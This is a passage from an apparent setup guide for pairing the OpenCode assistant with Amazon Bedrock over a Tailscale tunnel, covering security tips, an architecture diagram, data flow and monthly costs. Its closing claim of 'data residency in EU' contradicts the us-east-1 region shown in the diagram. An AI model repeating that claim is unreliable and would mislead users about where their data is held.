- Disable web search/fetch tools if not needed — reduces attack surface
- Tailscale ACLs — restrict which machines can reach your Bedrock VPC endpoint
- Environment-based auth — use
AWS_PROFILEor IAM roles instead of hardcoded keys - Review before executing — always inspect shell commands the model suggests
.opencodeignore— exclude sensitive files/directories from the model's reach
+----------------------------------------------------------+
| DEVELOPER MACHINE |
| |
| +------------+ +------------------+ |
| | OpenCode |---->| AWS SDK | |
| | (TUI/CLI) | | (credentials) | |
| +-----+------+ +--------+---------+ |
| | | |
| | MCP Servers | Tailscale Tunnel |
| v v |
| +-----------+ +---------------------+ |
| | Brave | | Tailscale Daemon | |
| | Search | | (encrypted mesh) | |
| | (local) | +----------+----------+ |
| +-----------+ | |
+----------------------------------------------------------+
|
Encrypted WireGuard Tunnel
|
+----------------------------------------------------------+
| AWS VPC (us-east-1) |
| |
| +-------------------+ +------------------+ |
| | VPC Endpoint |--->| Amazon Bedrock | |
| | (bedrock-runtime) | | (Qwen3/R1/etc.) | |
| +-------------------+ +------------------+ |
| |
| +-------------------+ +------------------+ |
| | S3 Bucket | | CloudWatch | |
| | (file storage) | | (logging, opt.) | |
| +-------------------+ +------------------+ |
| |
| +-------------------+ |
| | Tailscale Subnet | |
| | Router (t3.micro) | |
| +-------------------+ |
+----------------------------------------------------------+
Data flow:
- You type a coding request in OpenCode's TUI
- OpenCode sends it via AWS SDK to Bedrock through the Tailscale tunnel
- Traffic enters the VPC via the Tailscale subnet router
- Hits the VPC endpoint for Bedrock — never touches the public internet
- Response returns through the same encrypted path
- If tools are used (search, file ops), they execute locally or via MCP servers on your machine
| Component | Monthly Cost (EUR incl. VAT) |
|---|---|
| OpenCode | €0 (open source) |
| Bedrock inference (Qwen3 Coder 480B, medium use) | €25.75 |
| Tailscale Personal | €0 |
| EC2 t3.micro (subnet router) | €10.49 (or €0 if using own machine) |
| VPC Endpoint | €9.28 (optional but recommended) |
| S3 (file storage) | €1.20 |
| Brave Search API | €0 (free tier) |
| Total (minimal) | ~€27/mo |
| Total (recommended) | ~€47/mo |
With multi-model strategy (Qwen3 480B primary + Qwen3 30B for quick tasks): ~€32-40/mo.
Compared to Claude Code Pro (~€22/mo incl. VAT) or Cursor Pro (~€22/mo incl. VAT), this setup costs slightly more but offers full model flexibility, open-source transparency, data residency in EU, and complete infrastructure control.